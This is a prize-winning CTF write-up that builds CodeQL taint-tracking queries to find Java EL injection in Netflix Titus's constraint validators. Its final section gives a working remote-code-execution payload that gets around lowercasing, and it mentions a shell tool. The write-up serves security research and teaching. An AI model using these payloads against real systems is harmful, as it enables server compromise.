Submission for the GitHub Security Lab CTF 4: CodeQL and Chill - The Java Edition
UPDATE: This entry won the first prize 🎉
Table of Contents -
- Introduction
- Step 1: Data Flow and Taint Tracking Analysis
- Step 2: Second Issue
- Step 3: Errors and Exceptions
- Step 4: Exploit and Remediation
- Ending remarks and Feedback
The challenge introduction aptly summarizes the issue: user-controlled data is passed into the Bean Validation library function ConstraintValidatorContext.buildConstraintViolationWithTemplate, which supports Java EL expressions, and this leads to remote code execution. That might seem to be the end of the story, but it isn't. Getting an RCE wasn't as easy as just passing an EL expression: obstacles such as the lowercasing of user input stood in the way of a working exploit. In this report I explain how I used CodeQL to find the user-controlled data that flows into the target function, assess the requirements for a successful remote code execution, and finally present the exploit.
An important part of finding the exploit is finding where all the user-controlled data can come from. A good starting point is given in the challenge page itself: the first formal parameter of the function isValid.
So the predicate for this is quite straightforward:
class TypeConstraintValidator extends GenericInterface {
TypeConstraintValidator() { hasQualifiedName("javax.validation", "ConstraintValidator") }
}
predicate isSource(DataFlow::Node source) {
exists(Method m, ParameterizedInterface p |
source.asParameter() = m.getParameter(0) and
m.hasName("isValid") and
m.getDeclaringType().hasSupertype(p) and
p.getSourceDeclaration() instanceof TypeConstraintValidator
)
}
In this snippet, the class TypeConstraintValidator represents the interface javax.validation.ConstraintValidator. To explain the query: a node is a source if there exists a method whose first parameter is that node, whose name is isValid, and whose declaring type has javax.validation.ConstraintValidator as a supertype.
We see 8 results, but 2 of these 8 don't override the isValid provided by the interface javax.validation.ConstraintValidator. We filter them out using the following query (which also uses better variable names):
predicate isSource(DataFlow::Node source) {
exists(Method isValid, ParameterizedInterface originalConstrainValidator, Method originalIsValid |
source.asParameter() = isValid.getParameter(0) and
isValid.hasName("isValid") and
isValid.getDeclaringType().hasSupertype(originalConstrainValidator) and
originalConstrainValidator.getSourceDeclaration() instanceof TypeConstraintValidator and
originalIsValid.hasName("isValid") and
originalIsValid.getDeclaringType() = originalConstrainValidator and
isValid.overrides(originalIsValid)
)
}
NOTE: I attempted the bonus part too; its write-up is in the file bonus.md. Do check it out if the submissions are close!
As we know where the actual vulnerability lies, i.e. buildConstraintViolationWithTemplate, writing the sink was trivial.
predicate isSink(DataFlow::Node sink) {
exists(MethodAccess sinkFunction, Interface constraintValidatorContext |
sink.asExpr() = sinkFunction.getArgument(0) and
sinkFunction.getMethod().hasName("buildConstraintViolationWithTemplate") and
sinkFunction.getQualifier().getType() = constraintValidatorContext and
constraintValidatorContext.hasQualifiedName("javax.validation", "ConstraintValidatorContext")
)
}
That is, we want every node that is the first argument of a call to a method named buildConstraintViolationWithTemplate, where the qualifier of the call has type javax.validation.ConstraintValidatorContext.
We have our sources and sinks ready. We now run the full taint tracking query to find all the taint flow paths.
/**
* @kind path-problem
*/
import java
import semmle.code.java.dataflow.TaintTracking
import DataFlow::PathGraph
class TypeConstraintValidator extends GenericInterface {
TypeConstraintValidator() { hasQualifiedName("javax.validation", "ConstraintValidator") }
}
class MyTaintTrackingConfig extends TaintTracking::Configuration {
MyTaintTrackingConfig() { this = "MyTaintTrackingConfig" }
override predicate isSource(DataFlow::Node source) {
exists(Method isValid, ParameterizedInterface originalConstrainValidator, Method originalIsValid |
source.asParameter() = isValid.getParameter(0) and
isValid.hasName("isValid") and
isValid.getDeclaringType().hasSupertype(originalConstrainValidator) and
originalConstrainValidator.getSourceDeclaration() instanceof TypeConstraintValidator and
originalIsValid.hasName("isValid") and
originalIsValid.getDeclaringType() = originalConstrainValidator and
isValid.overrides(originalIsValid)
)
}
override predicate isSink(DataFlow::Node sink) {
exists(MethodAccess sinkFunction, Interface constraintValidatorContext |
sink.asExpr() = sinkFunction.getArgument(0) and
sinkFunction.getMethod().hasName("buildConstraintViolationWithTemplate") and
sinkFunction.getQualifier().getType() = constraintValidatorContext and
constraintValidatorContext.hasQualifiedName("javax.validation", "ConstraintValidatorContext")
)
}
}
from MyTaintTrackingConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "Custom constraint error message contains unsanitized user data"
And as mentioned in the challenge page, I get 0 results.
To debug why we get no results, we use partial flow analysis. We know that there is a vulnerability in the file SchedulingConstraintSetValidator.java, so we restrict the source to the first formal parameter of its isValid method (the one of type Container).
/**
* @kind path-problem
*/
import java
import semmle.code.java.dataflow.TaintTracking
import DataFlow::PartialPathGraph
class TypeConstraintValidator extends GenericInterface {
TypeConstraintValidator() { hasQualifiedName("javax.validation", "ConstraintValidator") }
}
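class MyTaintTrackingConfig extends TaintTracking::Configuration {
MyTaintTrackingConfig() { this = "MyTaintTrackingConfig" }
// Partial flow is only computed when an exploration limit is set; the value 10 is an assumed placeholder.
override int explorationLimit() { result = 10 }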
override predicate isSource(DataFlow::Node source) {
exists(Method isValid, ParameterizedInterface originalConstrainValidator, Method originalIsValid |
source.asParameter() = isValid.getParameter(0) and
isValid.hasName("isValid") and
isValid.getDeclaringType().hasSupertype(originalConstrainValidator) and
originalConstrainValidator.getSourceDeclaration() instanceof TypeConstraintValidator and
originalIsValid.hasName("isValid") and
originalIsValid.getDeclaringType() = originalConstrainValidator and
isValid.overrides(originalIsValid)
)
}
override predicate isSink(DataFlow::Node sink) {
exists(MethodAccess sinkFunction, Interface constraintValidatorContext |
sink.asExpr() = sinkFunction.getArgument(0) and
sinkFunction.getMethod().hasName("buildConstraintViolationWithTemplate") and
sinkFunction.getQualifier().getType() = constraintValidatorContext and
constraintValidatorContext.hasQualifiedName("javax.validation", "ConstraintValidatorContext")
)
}
}
from MyTaintTrackingConfig cfg, DataFlow::PartialPathNode source, DataFlow::PartialPathNode sink
where
cfg.hasPartialFlow(source, sink, _) and
exists(Method m |
source.getNode().asParameter() = m.getParameter(0) and
m.getParameter(0).getType().hasName("Container")
)
select sink, source, sink, "Partial flow from unsanitized user data"
In the output, we see that the flow stops at the return statements of getters such as getSoftConstraints and getHardConstraints.
As we saw in the last step, taint doesn't propagate through the getters. My best guess is that this is because getters do not always return tainted data: they often return fields, such as static variables, that are not tainted.
We need to step through the getters, as explained in the last step. For this, we add an additional step from the qualifier of a getter call to the call itself. As suggested in the challenge, we extend TaintTracking::AdditionalTaintStep.
class CustomStepper extends TaintTracking::AdditionalTaintStep {
override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
exists(MethodAccess callToGetter, GetterMethod getterMethod |
succ.asExpr() = callToGetter and
pred.asExpr() = callToGetter.getQualifier() and
callToGetter.getCallee() = getterMethod
)
}
}
We restrict our step to getter methods rather than methods in general. Note that we could also step through only getSoftConstraints and getHardConstraints, but it is a good idea to start with all getters so that we at least don't miss a case. In the output we see that we don't step through the keySet() method, so we must step through this method too.
class CustomStepper extends TaintTracking::AdditionalTaintStep {
override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
exists(MethodAccess ma, GetterMethod m |
succ.asExpr() = ma and
pred.asExpr() = ma.getQualifier() and
ma.getCallee() = m
) or
exists(MethodAccess callToMethod |
succ.asExpr() = callToMethod and
pred.asExpr() = callToMethod.getQualifier() and
callToMethod.getMethod().getName() = "keySet"
)
}
}
This time, the flow stops at the HashSet constructor.
We add a third condition, so that we step through getters, keySet() and the HashSet constructor.
class CustomStepper extends TaintTracking::AdditionalTaintStep {
override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
exists(MethodAccess ma, GetterMethod m |
succ.asExpr() = ma and
pred.asExpr() = ma.getQualifier() and
ma.getCallee() = m
) or
exists(MethodAccess callToMethod |
succ.asExpr() = callToMethod and
pred.asExpr() = callToMethod.getQualifier() and
callToMethod.getMethod().getName() = "keySet"
) or
exists(ConstructorCall callToConstructor |
succ.asExpr() = callToConstructor and
callToConstructor.getArgument(0) = pred.asExpr() and
callToConstructor.getConstructedType().getErasure().(Class).hasQualifiedName("java.util", "HashSet")
)
}
}
Hurray 🎉! We reached our final destination function. We have fixed the steps for the SchedulingConstraintSetValidator.java file. Other files to go!
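As a mental model only, the effect of the additional steps can be pictured as adding edges to a reachability graph. The sketch below is a toy Python model, not how CodeQL works internally; the node labels are simplified stand-ins for the expressions in SchedulingConstraintSetValidator.java, and the helper names and edge sets are made up for illustration.

```python
from collections import deque


def reachable(edges, source, sink):
    """Breadth-first search: is there a path from source to sink?"""
    seen = {source}
    queue = deque([source])
    while queue:
        node = queue.popleft()
        if node == sink:
            return True
        for nxt in edges.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return False


def merge(*edge_sets):
    """Combine several edge dictionaries into one."""
    merged = {}
    for edges in edge_sets:
        for node, targets in edges.items():
            merged.setdefault(node, []).extend(targets)
    return merged


# Edge the toy model treats as built in (the set ends up in the message string).
BUILT_IN = {"new HashSet(...)": ["sink argument"]}
# One edge per custom step added in this section.
GETTER_STEP = {"container": ["getSoftConstraints()"]}
KEYSET_STEP = {"getSoftConstraints()": ["keySet()"]}
CONSTRUCTOR_STEP = {"keySet()": ["new HashSet(...)"]}

# Each missing edge leaves the sink unreachable, mirroring the partial flow output.
print(reachable(BUILT_IN, "container", "sink argument"))
print(reachable(merge(BUILT_IN, GETTER_STEP, KEYSET_STEP), "container", "sink argument"))
print(reachable(merge(BUILT_IN, GETTER_STEP, KEYSET_STEP, CONSTRUCTOR_STEP), "container", "sink argument"))
```

Only the last call finds a path, which matches the experience above: every individual step had to be in place before the full flow appeared.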
To find the issue in the file SchedulingConstraintValidator.java, we use the same configuration but with a modified query:
from MyTaintTrackingConfig cfg, DataFlow::PartialPathNode source, DataFlow::PartialPathNode sink
where
cfg.hasPartialFlow(source, sink, _) and
exists(Method m |
source.getNode().asParameter() = m.getParameter(0) and
m.getDeclaringType().getName() = "SchedulingConstraintValidator"
)
select sink, source, sink, "Partial flow from unsanitized user data"
The flow stops at the keySet() call. We need to make it step through stream(), map(...) and collect(...).
class CustomStepper extends TaintTracking::AdditionalTaintStep {
override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
exists(MethodAccess callToGetter, GetterMethod getterMethod |
succ.asExpr() = callToGetter and
pred.asExpr() = callToGetter.getQualifier() and
callToGetter.getCallee() = getterMethod
) or
exists(MethodAccess callToMethod |
succ.asExpr() = callToMethod and
pred.asExpr() = callToMethod.getQualifier() and
(callToMethod.getMethod().getName() in ["keySet", "stream", "map", "collect"] )
) or
exists(ConstructorCall callToConstructor |
succ.asExpr() = callToConstructor and
callToConstructor.getArgument(0) = pred.asExpr() and
callToConstructor.getConstructedType().getErasure().(Class).hasQualifiedName("java.util", "HashSet")
)
}
}
Our flow reaches the target function 🎉
As stated in the challenge, we have to write a custom step such that if we see code like this
try {
    parse(tainted);
} catch (Exception e) {
    sink(e.getMessage());
}
we step from tainted to e.getMessage(), subject to some conditions: the method that the tainted variable/expression is passed into should throw a throwable that can be caught by the respective catch clause, and the successor expression should be a call that exposes the error's contents (using methods like getMessage()). The query I came up with is this:
class TryCatchStepper extends TaintTracking::AdditionalTaintStep {
override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
exists(TryStmt t, CatchClause c, MethodAccess throwingCall, MethodAccess errorWriter |
// connect try and catch
c.getTry() = t and
// in catch, the method access would be the successor...
errorWriter = succ.asExpr() and
// restricting to those methods that write something
(
errorWriter.getMethod().getName() in [
"getMessage", "getStackTrace",
"getSuppressed", "toString",
"getLocalizedMessage" ] or
errorWriter.getMethod().getName().prefix(3) = "get" or
errorWriter.getMethod() instanceof GetterMethod
) and
// and it's qualifier should be the error variable.
c.getVariable().getAnAccess() = errorWriter.getQualifier() and
// predecessor would be an argument of a method access...
throwingCall.getAnArgument() = pred.asExpr() and
// which is contained in the try statement
throwingCall.getEnclosingStmt().getParent*() = t.getBlock() and
// and the method should throw some subtype of the caught clause type
throwingCall.getMethod().getAThrownExceptionType().getASupertype*() = c.getACaughtType() and
// because it shows so many false positives.
not pred.asExpr() instanceof Literal
)
}
}
(I admit that errorWriter.getMethod().getName().prefix(3) = "get" is too general, but it helps when you don't know the inner implementation of the getter. We can also make it more specific to our project later.)
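To see why a step from the argument to the error message is reasonable, here is a small Python analogue of the try/catch pattern (the challenge code is Java; `parse` and `validate` are hypothetical names used only for this sketch). Python's `int()` quotes the offending input in its error message, so the message is derived from the tainted value.

```python
def parse(value: str) -> int:
    # int() raises ValueError and includes the offending input in its message.
    return int(value)


def validate(tainted: str) -> str:
    try:
        parse(tainted)
        return "ok"
    except ValueError as e:
        # The error text is built from `tainted`, so it must be treated as tainted too.
        return "Validation failed: " + str(e)


print(validate("42"))
print(validate("#{6*9}"))
```

The second call returns a message that contains the input verbatim, which is exactly the situation the custom step is meant to capture.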
As the challenge states, this step did not give me any additional paths in this codebase. A quick evaluation of the predicate, however, returns the results I expected.
Final query (without bonus part) is available in the file .
The first step towards a successful exploit is setting up a development environment. I set up the project on Docker using the docker-compose.yml and tweaked the Dockerfiles to enable debugging from IntelliJ IDEA.
A first glance at the files SchedulingConstraintValidator.java and SchedulingConstraintSetValidator.java suggests that the keys of the dictionaries are passed into the template builder function. That's where our EL expression will go.
A neat data model for Titus can be found here. It clearly shows that softConstraints and hardConstraints are inside the class Container, and that an instance of this class is held by JobDescriptor. So I made a reasonable guess that we can tweak the JobDescriptor object while creating a job to get an RCE. In the main readme file of titus-control-plane, under the section (here), they provide a basic curl request to submit a job. We just need to add the keys softConstraints and hardConstraints to the data payload. A very basic payload would be:
{
"applicationName": "myApp",
"owner": {
"teamEmail": "[email protected]"
},
"container": {
"resources": {
"cpu": 1,
"memoryMB": 128,
"diskMB": 128,
"networkMbps": 1
},
"securityProfile": {"iamRole": "test-role", "securityGroups": ["sg-test"]},
"image": {
"name": "ubuntu",
"tag": "xenial"
},
"softConstraints": {
"constraints": {
"#{6*9}": "lol"
}
},
"hardConstraints": {
"constraints": {
"#{6*9}": "lol"
}
}
},
"service": {
"capacity": {
"min": 1,
"max": 1,
"desired": 1
},
"retryPolicy": {
"immediate": {
"retries": 10
}
}
}
}
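When experimenting with different constraint keys, it can help to generate this body programmatically so that quotes inside the key are escaped correctly. The following is a minimal sketch; `build_job` is a hypothetical helper, the e-mail address is a placeholder, and the remaining fields simply mirror the payload above.

```python
import json


def build_job(constraint_key: str) -> str:
    """Return a job descriptor JSON string with the key in both constraint maps."""
    constraints = {"constraints": {constraint_key: "lol"}}
    job = {
        "applicationName": "myApp",
        "owner": {"teamEmail": "team@example.com"},  # placeholder address
        "container": {
            "resources": {"cpu": 1, "memoryMB": 128, "diskMB": 128, "networkMbps": 1},
            "securityProfile": {"iamRole": "test-role", "securityGroups": ["sg-test"]},
            "image": {"name": "ubuntu", "tag": "xenial"},
            "softConstraints": constraints,
            "hardConstraints": constraints,
        },
        "service": {
            "capacity": {"min": 1, "max": 1, "desired": 1},
            "retryPolicy": {"immediate": {"retries": 10}},
        },
    }
    # json.dumps escapes any double quotes inside the key.
    return json.dumps(job, indent=2)


print(build_job("#{6*9}"))
```

Letting `json.dumps` do the escaping avoids hand-editing backslashes once the key itself starts to contain quoted strings.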
The response is a 400, but it shows that our expression was evaluated (6*9 = 54):
{
"statusCode": 400,
"message": "Invalid Argument: {Validation failed: 'field: 'container.softConstraints', description: 'Unrecognized constraints [54]', type: 'HARD''}, {Validation failed: 'field: 'container.hardConstraints', description: 'Unrecognized constraints [54]', type: 'HARD''}, {Validation failed: 'field: 'container', description: 'Soft and hard constraints not unique. Shared constraints: [54]', type: 'HARD''}"
}
Things get interesting when we send an actual exploit, i.e we send the EL Expression #{''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec("touch /tmp/hello")')}
{
"statusCode": 500,
"message": "Unexpected error: HV000149: An exception occurred during message interpolation"
}
We open our debugger and find that, when a job is created, the individual constraints are validated first (using the isValid function in the SchedulingConstraintValidator.java file) to check that valid keys were sent; then the complete set is validated to check that the two constraint sets have nothing in common.
As the validation in SchedulingConstraintValidator.java runs first, we look at its isValid function:
Set<String> namesInLowerCase = value.keySet().stream().map(String::toLowerCase).collect(Collectors.toSet());
This is why we get a 500. The complete EL expression is converted to lowercase, i.e.
#{''.class.forname('javax.script.scriptenginemanager').newinstance().getenginebyname('js').eval('java.lang.runtime.getruntime().exec("touch /tmp/hello")')}
which obviously errors, because Java doesn't know any class named "javax.script.scriptenginemanager". This lowercasing doesn't happen in SchedulingConstraintSetValidator.java, but the code errors before reaching there.
So we now need to forge an EL expression in which all the letters are lowercase (which is tough, because Java inherently uses camel case).
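To get a feel for how much of the expression is affected, one can list the identifiers that lowercasing changes. This is a rough Python sketch; `identifiers_with_capitals` is a made-up helper, and the regular expression only looks at runs of ASCII letters.

```python
import re


def identifiers_with_capitals(expression: str) -> list:
    """Return the letter runs that change when the expression is lowercased."""
    words = re.findall(r"[A-Za-z]+", expression)
    return [w for w in words if w != w.lower()]


EXPRESSION = (
    "#{''.class.forName('javax.script.ScriptEngineManager').newInstance()"
    ".getEngineByName('js').eval('java.lang.Runtime.getRuntime()"
    ".exec(\"touch /tmp/hello\")')}"
)

for name in identifiers_with_capitals(EXPRESSION):
    print(name, "->", name.lower())
```

Every name printed here has to be reached some other way, either through an index into the methods array or by assembling the string from lowercase pieces.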
To achieve this, we use a.class.methods[*].invoke(a, args...) to invoke any method, instead of invoking it as a.methodCanContainCapitalLetters(args...). The only thing we need to find is the index in a.class.methods at which the method we need lies. We can also use 'a'.replace('a', 83) to produce "S", and similarly for other capital letters.
The table below contains some examples:
Required Code | Payload |
---|---|
''.class.forName(x) | ''.class.class.methods[0].invoke(''.class, x) |
''.class.forName('javax.script.ScriptEngineManager') | ''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager') |
''.class.forName('javax.script.ScriptEngineManager').newInstance() | ''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')) |
''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js') | ''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')).class.methods[1].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')), 'js') |
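The string rewriting in the Payload column is mechanical, so it can be generated. Below is a minimal Python sketch of that translation; `el_lowercase_literal` is a hypothetical helper name, and it assumes the input contains no single quotes.

```python
def el_lowercase_literal(text: str) -> str:
    """Rewrite text as an EL string expression that contains no capital letters.

    Each capital letter becomes 'a'.replace('a', <char code>); everything else
    is kept as a quoted literal. Assumes text has no single quotes.
    """
    parts = []
    run = ""
    for ch in text:
        if ch.isupper():
            if run:
                parts.append("'" + run + "'")
                run = ""
            parts.append("'a'.replace('a', %d)" % ord(ch))
        else:
            run += ch
    if run:
        parts.append("'" + run + "'")
    return " + ".join(parts)


print(el_lowercase_literal("javax.script.ScriptEngineManager"))
```

For the class name used above, this prints the same concatenation that appears in the table, and the result is unchanged by lowercasing.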
Continuing such translation, I managed to run ''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').compile('java.lang.Runtime.getRuntime().exec("touch /tmp/hello")').eval()
{
"applicationName": "myApp",
"owner": {
"teamEmail": "[email protected]"
},
"container": {
"resources": {
"cpu": 1,
"memoryMB": 128,
"diskMB": 128,
"networkMbps": 1
},
"securityProfile": {"iamRole": "test-role", "securityGroups": ["sg-test"]},
"image": {
"name": "ubuntu",
"tag": "xenial"
},
"softConstraints": {
},
"hardConstraints": {
"constraints": {
"#{''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')).class.methods[1].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')), 'js').class.methods[7].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')).class.methods[1].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')), 'js'), 'print(1);').class.methods[3].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')).class.methods[1].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')), 'js').class.methods[7].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')).class.methods[1].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')), 'js'), 'java.lang.' + 'a'.replace('a', 82) + 'untime.get' + 'a'.replace('a', 82) + 'untime().exec(\"touch /tmp/pwn\")')) + ''}": "lol"
}
}
},
"service": {
"capacity": {
"min": 1,
"max": 1,
"desired": 1
},
"retryPolicy": {
"immediate": {
"retries": 10
}
}
}
}
🎉
But this payload comes with a caveat: the index of a particular method can change between boots. This generally happens for methods with multiple overloads, like compile, which has overloads for both String and Reader. I observed its index change from 7 to 6. So it's important to first find the indexes of the desired methods before executing the code. That said, compile doesn't contain capital letters (I forgot this :p) and could be called by name, so this issue isn't much of a problem for us.
A more refined version of this payload is present in this file (if you only need the JSON, see this file), but the caveat still applies there. I never experienced a problem, but as we are still using indexes, one can occur. The best way to handle this is to loop over all indexes, fetch each method's signature, and see at which index the required method appears.
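The index search described here could look roughly like the following Python sketch. `find_method_indexes` and `fetch_signature` are hypothetical: `fetch_signature(i)` stands in for whatever mechanism reports the signature at index `i` (or `None` past the end), and the signatures listed are fake sample data, not real output.

```python
def find_method_indexes(fetch_signature, wanted, limit=100):
    """Return every index whose reported signature contains `wanted`."""
    matches = []
    for index in range(limit):
        signature = fetch_signature(index)
        if signature is None:  # ran past the end of the methods array
            break
        if wanted in signature:
            matches.append(index)
    return matches


# Fake data standing in for what the target would report; the order is arbitrary.
FAKE_SIGNATURES = [
    "forName(java.lang.String)",
    "forName(java.lang.String,boolean,java.lang.ClassLoader)",
    "toString()",
    "newInstance()",
]


def fake_fetch(index):
    return FAKE_SIGNATURES[index] if index < len(FAKE_SIGNATURES) else None


print(find_method_indexes(fake_fetch, "forName(java.lang.String)"))
print(find_method_indexes(fake_fetch, "forName("))
```

Matching on the full parameter list rather than the bare name is what separates overloads, which is where the index shifts were observed.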
A python project where you can run a complete shell (like in SSH) is present here.
Dependencies other than that for Titus:
- Python 3
Steps:
- Set up titus-control-plane at commit 8a8bd4c on the default port (7001).
- Change directory to titus-shell/ in this repository.
- Install the package dependencies (in a virtual environment maybe) using pip3 install -r requirements.txt
- Run python3 shell.py to start the shell.
- Any command you enter will run on the gateway container of Titus.
If you don't wish to run a shell, just copy the contents of the refined.sh file and paste them into your shell. You will see that a file /tmp/pwn is created in the gateway container.
Please note that this is a sort of shell, not a complete shell. So shell builtins (like cd) and redirections (echo abc > a.txt) won't work.
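A likely reason, assuming the commands end up in Runtime.exec(String) as in the payload shown earlier: that method splits the command on whitespace and starts the program directly, without a shell. The Python sketch below only mimics that splitting; `exec_style_split` is a made-up name.

```python
def exec_style_split(command: str) -> list:
    """Split on whitespace only, with no shell parsing of quotes or operators."""
    return command.split()


# The redirection operator and file name become ordinary arguments to echo.
print(exec_style_split("echo abc > a.txt"))
```

With no shell in between, `>` is just another argument, and `cd` has no lasting effect because each command runs in its own process.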
Running the same query on latest commit on LGTM.com (link - https://lgtm.com/query/3543348055529973809/) gives me no alerts!
This was my first use of CodeQL, and I must say that writing queries was not a pain at all thanks to the autocomplete feature, thumbs up to that! However, the engine takes up a lot of temporary disk space, and I almost ran out of space on my laptop. I feel CodeQL is a powerful tool, and I am planning to perform static analysis on Firefox after this. Thanks to the creators of this awesome tool! Cheers!